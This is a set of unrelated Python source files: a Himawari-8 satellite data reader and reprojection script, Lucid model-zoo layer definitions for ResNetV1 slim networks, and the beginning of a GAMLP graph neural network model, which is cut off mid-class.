('File name of GSICS Correction', 'S1', 128), \
('Spare6', 'S1', 56), \
('Block number7', 'i1', 1), \
('Block length7', 'i2', 1), \
('Total number of segments', 'i1', 1), \
('Segment sequence number', 'i1', 1), \
('First line number of image segment', 'i2', 1), \
('Spare7', 'S1', 40), \
('Block number8', 'i1', 1), \
('Block length8', 'i2', 1), \
('Center column of rotation', 'float32', 1), \
('Center line of rotation', 'float32', 1), \
('Amount of rotational correction', 'float64', 1), \
('Number of correction information data for column and line direction', 'i2', 1), \
('Line number after rotation', 'i2', 1), \
('Shift amount for column direction', 'float32', 1), \
('Shift amount for line direction8', 'float32', 1), \
('Spare8', 'S1', 50), \
('Block number9', 'i1', 1), \
('Block length9', 'i2', 1), \
('Number of observation times9', 'i2', 1), \
('Line number9', 'i2', 1), \
('Observation time9', 'float64', 1), \
('Spare9', 'S1', 70), \
('Block number10', 'i1', 1), \
('Block length10', 'i4', 1), \
('Number of error information data', 'i2', 1), \
('Line number10', 'i2', 1), \
('Number of error pixels per line10', 'i2', 1), \
('Spare10', 'S1', 36), \
('Block number11', 'i1', 1), \
('Block length11', 'i2', 1), \
('Spare11', 'S1', 256), \
('Count value of each pixel', 'i2', res)]
    data = np.fromfile(inputfile, dtype=formation)
    return data
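The header parsing above hinges on `np.fromfile` with a structured dtype: each `(name, type, count)` tuple maps a fixed-width slice of the binary file onto a named field. A toy round-trip makes the mechanism concrete; the field names and values below are invented for illustration, not the real HSD header layout.

```python
import numpy as np

# Miniature structured dtype in the same style as `formation` above
# (invented fields, not the actual Himawari header blocks).
header_dtype = np.dtype([('Block number', 'i1'),
                         ('Block length', '<i2'),
                         ('sub_lon', '<f8')])

# Serialize one record to raw bytes, then parse it back by field name,
# exactly as read_Himawari_info does with np.fromfile on the .DAT file.
raw = np.array([(1, 282, 140.7)], dtype=header_dtype).tobytes()
parsed = np.frombuffer(raw, dtype=header_dtype)

assert parsed['Block number'][0] == 1
assert abs(float(parsed['sub_lon'][0]) - 140.7) < 1e-9
```

The same field-name lookup (`data['Count value of each pixel']`, `info['sub_lon']`, ...) is what the rest of the script relies on.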
def latlon2idx(lon, lat, B, A, H, pi, STAR_POINT_LON, COFF, CFAC):
    """Forward geostationary projection: geodetic lon/lat (deg) -> full-disk column/row."""
    ANG = np.pi / 180
    lon = np.array(lon) * ANG
    lat = np.array(lat) * ANG
    f = np.arctan(np.tan(lat) * (A * A) / (B * B))
    re = B / (np.sqrt(1 - (np.cos(f) * np.cos(f)) * (A * A - B * B) / (A * A)))
    r1 = H - re * np.cos(f) * np.cos(lon - (STAR_POINT_LON * ANG))
    r2 = 0 - re * np.cos(f) * np.sin(lon - (STAR_POINT_LON * ANG))
    r3 = re * np.sin(f)
    rn = np.sqrt(r1 * r1 + r2 * r2 + r3 * r3)
    x = np.arctan(0 - r2 / r1) * 180 / np.pi
    y = np.arcsin(0 - r3 / rn) * 180 / np.pi
    col = (COFF + x * CFAC / 2**16).astype(int)
    # the full-disk grid is square, so the line offset/scaling factor equal COFF/CFAC here
    row = (COFF + y * CFAC / 2**16).astype(int)
    return col, row
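The projection can be exercised stand-alone. The constants below are placeholders for values normally read from header block 3 (the real `COFF`/`CFAC` depend on resolution), so treat this as a sketch; at the sub-satellite point both scan angles are zero, so the pixel lands exactly at the image offset.

```python
import numpy as np

# Placeholder Himawari-8 full-disk constants (normally read from HSD header block 3).
B_EQ, A_POL = 6378.1370, 6356.7523   # equatorial / polar radius, km
H_SAT = 42164.0                      # Earth's center -> satellite distance, km
SUB_LON = 140.7                      # sub-satellite point longitude, deg E
COFF, CFAC = 2750.5, 20466275        # illustrative 2 km-grid offset / scaling factor

def latlon2idx(lon, lat):
    ang = np.pi / 180
    lon, lat = np.asarray(lon) * ang, np.asarray(lat) * ang
    f = np.arctan(np.tan(lat) * (A_POL**2) / (B_EQ**2))
    re = B_EQ / np.sqrt(1 - np.cos(f)**2 * (A_POL**2 - B_EQ**2) / A_POL**2)
    r1 = H_SAT - re * np.cos(f) * np.cos(lon - SUB_LON * ang)
    r2 = -re * np.cos(f) * np.sin(lon - SUB_LON * ang)
    r3 = re * np.sin(f)
    rn = np.sqrt(r1**2 + r2**2 + r3**2)
    x = np.arctan(-r2 / r1) * 180 / np.pi   # scan angles, degrees
    y = np.arcsin(-r3 / rn) * 180 / np.pi
    col = (COFF + x * CFAC / 2**16).astype(int)
    row = (COFF + y * CFAC / 2**16).astype(int)  # square grid: LOFF/LFAC == COFF/CFAC
    return col, row

# At the sub-satellite point the scan angles vanish, so col/row equal int(COFF).
col, row = latlon2idx(140.7, 0.0)
assert int(col) == 2750 and int(row) == 2750
```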
def mergeAHI8(un_path, time, bd, res):
    DATA = {}
    for i in range(1, 11):
        inputfile = un_path + '/HS_H08_' + time + '_' + bd + '_FLDK_' + res + '_S{:02d}10.DAT'.format(i)
        data = read_Himawari(inputfile)
        DATA[i] = data
    BAND = np.vstack([DATA[i] for i in range(1, 11)]).astype(int)
    return BAND, inputfile
def bandextraction(un_path, time, bd, res):
    band, inputfile = mergeAHI8(un_path, time, bd, res)
    info = read_Himawari_info(inputfile)
    BAND = ToALBEDOorBT(band, info)
    band_ccl, longitude, latitude = fulldisktoCCL(BAND, info)
    return band_ccl, longitude, latitude
def ToALBEDOorBT(BAND, info):
    # work in float so calibrated values are not truncated into the int count array
    BAND = BAND.astype('float64')
    index = np.where(BAND > 0)
    indexunvalid = np.where(BAND <= 0)
    rad = BAND
    Slop = float(info['Slope for count-radiance conversion equation '][0])
    Int = float(info['Intercept for count-radiance conversion equation'][0])
    # band number read from the header instead of the global `bd`
    if int(info['Band number'][0]) < 7:
        # visible/near-IR bands: counts -> radiance -> albedo
        c = float(info['Coefficient for transformation from radiance to albedo'][0])
        BAND = (BAND * Slop + Int) * c
        BAND[indexunvalid] = -2
    else:
        # infrared bands: counts -> radiance -> brightness temperature
        h = float(info['Planck constant'][0])
        c = float(info['Speed of light'][0])
        k = float(info['Boltzmann constant'][0])
        wv = float(info['Central wave length'][0]) * 1e-6
        c0 = float(info['radiance to brightness temperature_c0'][0])
        c1 = float(info['radiance to brightness temperature_c1'][0])
        c2 = float(info['radiance to brightness temperature_c2'][0])
        rad = (rad * Slop + Int) * 1e6
        Te = h * c / ((k * wv) * (np.log(2 * h * c * c / ((wv**5) * rad) + 1)))
        BT = c0 + c1 * Te + c2 * Te * Te
        BAND[index] = BT[index]  # only overwrite valid pixels
    return BAND
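The infrared branch above is an inverse Planck function followed by a quadratic correction. It can be sanity-checked in isolation; the wavelength and radiance below are illustrative values chosen to land near a typical terrestrial temperature, not numbers taken from any header.

```python
import numpy as np

# Physical constants (SI units).
h = 6.62607015e-34   # Planck constant, J s
c = 2.99792458e8     # speed of light, m/s
k = 1.380649e-23     # Boltzmann constant, J/K

wv = 10.4e-6         # illustrative thermal-IR central wavelength, m
rad = 9.79e6         # illustrative spectral radiance, W m^-2 sr^-1 m^-1

# Inverse Planck function: effective temperature from spectral radiance,
# the same expression as the Te line in ToALBEDOorBT.
Te = h * c / ((k * wv) * np.log(2 * h * c * c / (wv**5 * rad) + 1))

# An Earth scene should come out in a plausible temperature range.
assert 250 < Te < 330
```

The factor `1e6` in the function converts the slope/intercept-calibrated radiance from per-micrometre to per-metre so the SI constants apply.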
def fulldisktoCCL(BAND, info):
    # Earth's equatorial (semi-major) radius, km
    B = float(info['Earth’s equatorial radius'][0])
    # Earth's polar (semi-minor) radius, km
    A = float(info['Earth’s polar radius'][0])
    # distance from Earth's center to the satellite, km
    H = float(info['Distance from Earth’s center to virtual satellite'][0])
    pi = np.pi
    # sub-satellite point longitude
    STAR_POINT_LON = 140.7
    # column offset
    COFF = float(info['Column offset'][0])
    # column scaling factor
    CFAC = float(info['Column scaling factor'][0])
    # 0.02-degree target grid: 72E to 182E, 55N down to 55S
    longitude = np.arange(73 - 1, 135 + 70 - 22 - 1, 0.02)
    latitude = np.arange(55, -55, -0.02)
    lon, lat = np.meshgrid(longitude, latitude)
    col, row = latlon2idx(lon, lat, B, A, H, pi, STAR_POINT_LON, COFF, CFAC)
    band_ccl = BAND[row, col]
    return band_ccl, longitude, latitude
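The resampling step is a single fancy-indexing gather: `BAND[row, col]` pulls one source pixel per output grid cell in one vectorized operation. The toy arrays below show the same pattern on a 4x4 image.

```python
import numpy as np

img = np.arange(16).reshape(4, 4)    # stand-in for the full-disk image
row = np.array([[0, 1], [2, 3]])     # per-output-pixel source rows
col = np.array([[0, 0], [1, 1]])     # per-output-pixel source columns

# Gather: out[i, j] = img[row[i, j], col[i, j]], same shape as row/col.
out = img[row, col]

assert (out == np.array([[0, 4], [9, 13]])).all()
```

Because `row` and `col` share the output grid's shape, no loop over pixels is needed; this is why `latlon2idx` is written to accept whole meshgrid arrays.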
time = '20200701_0800'
un_path = "C:/Users/guoyuchen/Desktop/fulldisk/output/"
bandlist = ['B03']  # ,'B02']  # ['B03','B04','B05','B06','B07','B08','B09','B10','B11','B12','B13','B14','B15','B16']
reslist = ['R10']  # ,'R20','R05']
bd = 'B01'
# ALLBAND = {}
# for bd in bandlist:
#     band_ccl, longitude, latitude = bandextraction(un_path, time, bd, 'R05')
#     ALLBAND[bd] = band_ccl
res = reslist[0]
DATA = {}
for i in range(1, 11):
    inputfile = un_path + '/HS_H08_' + time + '_' + bd + '_FLDK_' + res + '_S{:02d}10.DAT'.format(i)
    data = read_Himawari(inputfile)
    DATA[i] = data
BAND = np.vstack([DATA[i] for i in range(1, 11)]).astype(int)
info = read_Himawari_info(inputfile)
BAND = ToALBEDOorBT(BAND, info)
band_ccl, longitude, latitude = fulldisktoCCL(BAND, info)
'''
img = np.zeros((5500,5500,3))
img[:,:,0] = np.clip(ALLBAND['B01'],0,1)
img[:,:,1] = np.clip(ALLBAND['B02'],0,1)
img[:,:,2] = np.clip(ALLBAND['B01'],0,1)
'''
# File: lucid/modelzoo/slim_models/ResNetV1.py (repo: gabgoh/lucid, license: Apache-2.0)

# Copyright 2018 The Lucid Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import, division, print_function
from lucid.modelzoo.vision_base import Model, _layers_from_list_of_dicts, IMAGENET_MEAN
class ResnetV1_50_slim(Model):
  """ResnetV1 50 as implemented by the TensorFlow slim framework.

  This function provides the pre-trained reimplementation from TF slim:
  https://github.com/tensorflow/models/tree/master/research/slim
  """
  model_path = 'gs://modelzoo/vision/slim_models/ResnetV1_50.pb'
  labels_path = 'gs://modelzoo/labels/ImageNet_standard.txt'
  synsets_path = 'gs://modelzoo/labels/ImageNet_standard_with_dummy_synsets.txt'
  dataset = 'ImageNet'
  image_shape = [224, 224, 3]
  image_value_range = (-117, 255-117)  # Inferred by testing, may not be exactly right
  input_name = 'input'

# In ResNetV1, each add (joining the residual branch) is followed by a Relu;
# this seems to be the natural "layer" position.
ResnetV1_50_slim.layers = _layers_from_list_of_dicts(ResnetV1_50_slim, [
{'tags': ['conv'], 'name': 'resnet_v1_50/conv1/Relu', 'depth': 64},
{'tags': ['conv'], 'name': 'resnet_v1_50/block1/unit_1/bottleneck_v1/Relu', 'depth': 256},
{'tags': ['conv'], 'name': 'resnet_v1_50/block1/unit_2/bottleneck_v1/Relu', 'depth': 256},
{'tags': ['conv'], 'name': 'resnet_v1_50/block1/unit_3/bottleneck_v1/Relu', 'depth': 256},
{'tags': ['conv'], 'name': 'resnet_v1_50/block2/unit_1/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_50/block2/unit_2/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_50/block2/unit_3/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_50/block2/unit_4/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_50/block3/unit_1/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_50/block3/unit_2/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_50/block3/unit_3/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_50/block3/unit_4/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_50/block3/unit_5/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_50/block3/unit_6/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_50/block4/unit_1/bottleneck_v1/Relu', 'depth': 2048},
{'tags': ['conv'], 'name': 'resnet_v1_50/block4/unit_2/bottleneck_v1/Relu', 'depth': 2048},
{'tags': ['conv'], 'name': 'resnet_v1_50/block4/unit_3/bottleneck_v1/Relu', 'depth': 2048},
{'tags': ['dense'], 'name': 'resnet_v1_50/predictions/Softmax', 'depth': 1000},
])
class ResnetV1_101_slim(Model):
  """ResnetV1 101 as implemented by the TensorFlow slim framework.

  This function provides the pre-trained reimplementation from TF slim:
  https://github.com/tensorflow/models/tree/master/research/slim
  """
  model_path = 'gs://modelzoo/vision/slim_models/ResnetV1_101.pb'
  labels_path = 'gs://modelzoo/labels/ImageNet_standard.txt'
  synsets_path = 'gs://modelzoo/labels/ImageNet_standard_with_dummy_synsets.txt'
  dataset = 'ImageNet'
  image_shape = [224, 224, 3]
  image_value_range = (-117, 255-117)  # Inferred by testing, may not be exactly right
  input_name = 'input'

# In ResNetV1, each add (joining the residual branch) is followed by a Relu;
# this seems to be the natural "layer" position.
ResnetV1_101_slim.layers = _layers_from_list_of_dicts(ResnetV1_101_slim, [
{'tags': ['conv'], 'name': 'resnet_v1_101/conv1/Relu', 'depth': 64},
{'tags': ['conv'], 'name': 'resnet_v1_101/block1/unit_1/bottleneck_v1/Relu', 'depth': 256},
{'tags': ['conv'], 'name': 'resnet_v1_101/block1/unit_2/bottleneck_v1/Relu', 'depth': 256},
{'tags': ['conv'], 'name': 'resnet_v1_101/block1/unit_3/bottleneck_v1/Relu', 'depth': 256},
{'tags': ['conv'], 'name': 'resnet_v1_101/block2/unit_1/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_101/block2/unit_2/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_101/block2/unit_3/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_101/block2/unit_4/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_1/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_2/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_3/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_4/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_5/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_6/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_7/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_8/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_9/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_10/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_11/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_12/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_13/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_14/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_15/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_16/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_17/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_18/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_19/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_20/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_21/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_22/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block3/unit_23/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_101/block4/unit_1/bottleneck_v1/Relu', 'depth': 2048},
{'tags': ['conv'], 'name': 'resnet_v1_101/block4/unit_2/bottleneck_v1/Relu', 'depth': 2048},
{'tags': ['conv'], 'name': 'resnet_v1_101/block4/unit_3/bottleneck_v1/Relu', 'depth': 2048},
{'tags': ['dense'], 'name': 'resnet_v1_101/predictions/Softmax', 'depth': 1000},
])
class ResnetV1_152_slim(Model):
  """ResnetV1 152 as implemented by the TensorFlow slim framework.

  This function provides the pre-trained reimplementation from TF slim:
  https://github.com/tensorflow/models/tree/master/research/slim
  """
  model_path = 'gs://modelzoo/vision/slim_models/ResnetV1_152.pb'
  labels_path = 'gs://modelzoo/labels/ImageNet_standard.txt'
  synsets_path = 'gs://modelzoo/labels/ImageNet_standard_with_dummy_synsets.txt'
  dataset = 'ImageNet'
  image_shape = [224, 224, 3]
  image_value_range = (-117, 255-117)  # Inferred by testing, may not be exactly right
  input_name = 'input'

# In ResNetV1, each add (joining the residual branch) is followed by a Relu;
# this seems to be the natural "layer" position.
ResnetV1_152_slim.layers = _layers_from_list_of_dicts(ResnetV1_152_slim, [
{'tags': ['conv'], 'name': 'resnet_v1_152/conv1/Relu', 'depth': 64},
{'tags': ['conv'], 'name': 'resnet_v1_152/block1/unit_1/bottleneck_v1/Relu', 'depth': 256},
{'tags': ['conv'], 'name': 'resnet_v1_152/block1/unit_2/bottleneck_v1/Relu', 'depth': 256},
{'tags': ['conv'], 'name': 'resnet_v1_152/block1/unit_3/bottleneck_v1/Relu', 'depth': 256},
{'tags': ['conv'], 'name': 'resnet_v1_152/block2/unit_1/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_152/block2/unit_2/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_152/block2/unit_3/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_152/block2/unit_4/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_152/block2/unit_5/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_152/block2/unit_6/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_152/block2/unit_7/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_152/block2/unit_8/bottleneck_v1/Relu', 'depth': 512},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_1/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_2/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_3/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_4/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_5/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_6/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_7/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_8/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_9/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_10/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_11/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_12/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_13/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_14/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_15/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_16/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_17/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_18/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_19/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_20/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_21/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_22/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_23/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_24/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_25/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_26/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_27/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_28/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_29/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_30/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_31/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_32/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_33/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_34/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_35/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block3/unit_36/bottleneck_v1/Relu', 'depth': 1024},
{'tags': ['conv'], 'name': 'resnet_v1_152/block4/unit_1/bottleneck_v1/Relu', 'depth': 2048},
{'tags': ['conv'], 'name': 'resnet_v1_152/block4/unit_2/bottleneck_v1/Relu', 'depth': 2048},
{'tags': ['conv'], 'name': 'resnet_v1_152/block4/unit_3/bottleneck_v1/Relu', 'depth': 2048},
{'tags': ['dense'], 'name': 'resnet_v1_152/predictions/Softmax', 'depth': 1000},
])
# File: GAMLP/model.py (repo: ytchx1999/MAXP_DGL_Graph, license: MIT)

import dgl.function as fn
import torch.nn.functional as F
import torch.nn as nn
import torch
from layer import *
class R_GAMLP(nn.Module):  # recursive GAMLP
    def __init__(self, nfeat, hidden, nclass, num_hops,
                 dropout, input_drop, att_dropout, alpha, n_layers_1, n_layers_2, act="relu",
                 pre_process=False, residual=False, pre_dropout=False, bns=False, fine_tune=None):
        super(R_GAMLP, self).__init__()
        self.num_hops = num_hops
        self.prelu = nn.PReLU()
        if pre_process:
            self.lr_att = nn.Linear(hidden + hidden, 1)
            self.lr_output = FeedForwardNetII(
                hidden, hidden, nclass, n_layers_2, dropout, alpha, bns)
            self.process = nn.ModuleList(
                [FeedForwardNet(nfeat, hidden, hidden, 2, dropout, bns) for i in range(num_hops)])
        else:
            self.lr_att = nn.Linear(nfeat + nfeat, 1)
            self.lr_output = FeedForwardNetII(
                nfeat, hidden, nclass, n_layers_2, dropout, alpha, bns)
        self.dropout = nn.Dropout(dropout)
        self.input_drop = nn.Dropout(input_drop)
        self.att_drop = nn.Dropout(att_dropout)
        self.pre_process = pre_process
        self.res_fc = nn.Linear(nfeat, hidden)
        self.residual = residual
        self.pre_dropout = pre_dropout
        if act == 'sigmoid':
            self.act = torch.nn.Sigmoid()
        elif act == 'relu':
            self.act = torch.nn.ReLU()
        elif act == 'leaky_relu':
            self.act = torch.nn.LeakyReLU(0.2)
        self.reset_parameters()
        if fine_tune is not None:
            for param in self.prelu.parameters():
                param.requires_grad = False
            for param in self.lr_att.parameters():
                param.requires_grad = False
            for param in self.process.parameters():
                param.requires_grad = False
            for param in self.res_fc.parameters():
                param.requires_grad = False

    def reset_parameters(self):
        gain = nn.init.calculate_gain("relu")
        nn.init.xavier_uniform_(self.lr_att.weight, gain=gain)
        nn.init.zeros_(self.lr_att.bias)
        nn.init.xavier_uniform_(self.res_fc.weight, gain=gain)
        nn.init.zeros_(self.res_fc.bias)
        self.lr_output.reset_parameters()
        if self.pre_process:
            for layer in self.process:
                layer.reset_parameters()
def forward(self, feature_list):
num_node = feature_list[0].shape[0]
feature_list = [self.input_drop(feature) for feature in feature_list]
input_list = []
if self.pre_process:
for i in range(self.num_hops):
input_list.append(self.process[i](feature_list[i]))
else:
input_list = feature_list
attention_scores = []
attention_scores.append(self.act(self.lr_att(
torch.cat([input_list[0], input_list[0]], dim=1))))
for i in range(1, self.num_hops):
history_att = torch.cat(attention_scores[:i], dim=1)
att = F.softmax(history_att, 1)
history = torch.mul(input_list[0], self.att_drop(
att[:, 0].view(num_node, 1)))
for j in range(1, i):
history = history + \
torch.mul(input_list[j], self.att_drop(
att[:, j].view(num_node, 1)))
attention_scores.append(self.act(self.lr_att(
torch.cat([history, input_list[i]], dim=1))))
attention_scores = torch.cat(attention_scores, dim=1)
attention_scores = F.softmax(attention_scores, 1)
right_1 = torch.mul(input_list[0], self.att_drop(
attention_scores[:, 0].view(num_node, 1)))
for i in range(1, self.num_hops):
right_1 = right_1 + \
torch.mul(input_list[i], self.att_drop(
attention_scores[:, i].view(num_node, 1)))
if self.residual:
right_1 += self.res_fc(feature_list[0])
right_1 = self.dropout(self.prelu(right_1))
if self.pre_dropout:
right_1 = self.dropout(right_1)
right_1 = self.lr_output(right_1)
return right_1
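The recursive hop attention above is easier to follow outside the tensor code. Below is a minimal pure-Python sketch of the same recursion for a single node with scalar hop features; `score` stands in for the learned `lr_att` layer, and dropout is omitted. All names here are illustrative, not part of the GAMLP API.

```python
import math

def sigmoid(x):
    return 1.0 / (1.0 + math.exp(-x))

def softmax(xs):
    m = max(xs)
    exps = [math.exp(x - m) for x in xs]
    s = sum(exps)
    return [e / s for e in exps]

def recursive_hop_attention(hops, score):
    """hops: per-hop scalar features for one node.
    score(history, current) plays the role of lr_att."""
    scores = [score(hops[0], hops[0])]
    for i in range(1, len(hops)):
        att = softmax(scores[:i])                       # weights over earlier hops
        history = sum(a * h for a, h in zip(att, hops[:i]))
        scores.append(score(history, hops[i]))          # score hop i vs. its history
    att = softmax(scores)
    return sum(a * h for a, h in zip(att, hops))        # final weighted combination

# toy gate: favour hops close to the running history value
combined = recursive_hop_attention(
    [1.0, 2.0, 4.0],
    lambda hist, cur: sigmoid(-(hist - cur) ** 2),
)
```

Each hop is scored against the attention-weighted history of the hops before it, and the output is the softmax-weighted combination of all hops, so the result always stays inside the range spanned by the hop features.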
class JK_GAMLP(nn.Module):
    def __init__(self, nfeat, hidden, nclass, num_hops,
                 dropout, input_drop, att_dropout, alpha, n_layers_1,
                 n_layers_2, act, pre_process=False, residual=False,
                 pre_dropout=False, bns=False):
        super(JK_GAMLP, self).__init__()
        self.num_hops = num_hops
        self.prelu = nn.PReLU()
        self.pre_dropout = pre_dropout
        if pre_process:
            self.lr_jk_ref = FeedForwardNetII(
                num_hops * hidden, hidden, hidden, n_layers_1, dropout,
                alpha, bns)
            self.lr_att = nn.Linear(hidden + hidden, 1)
            self.lr_output = FeedForwardNetII(
                hidden, hidden, nclass, n_layers_2, dropout, alpha, bns)
            self.process = nn.ModuleList(
                [FeedForwardNet(nfeat, hidden, hidden, 2, dropout, bns)
                 for _ in range(num_hops)])
        else:
            self.lr_jk_ref = FeedForwardNetII(
                num_hops * nfeat, hidden, hidden, n_layers_1, dropout,
                alpha, bns)
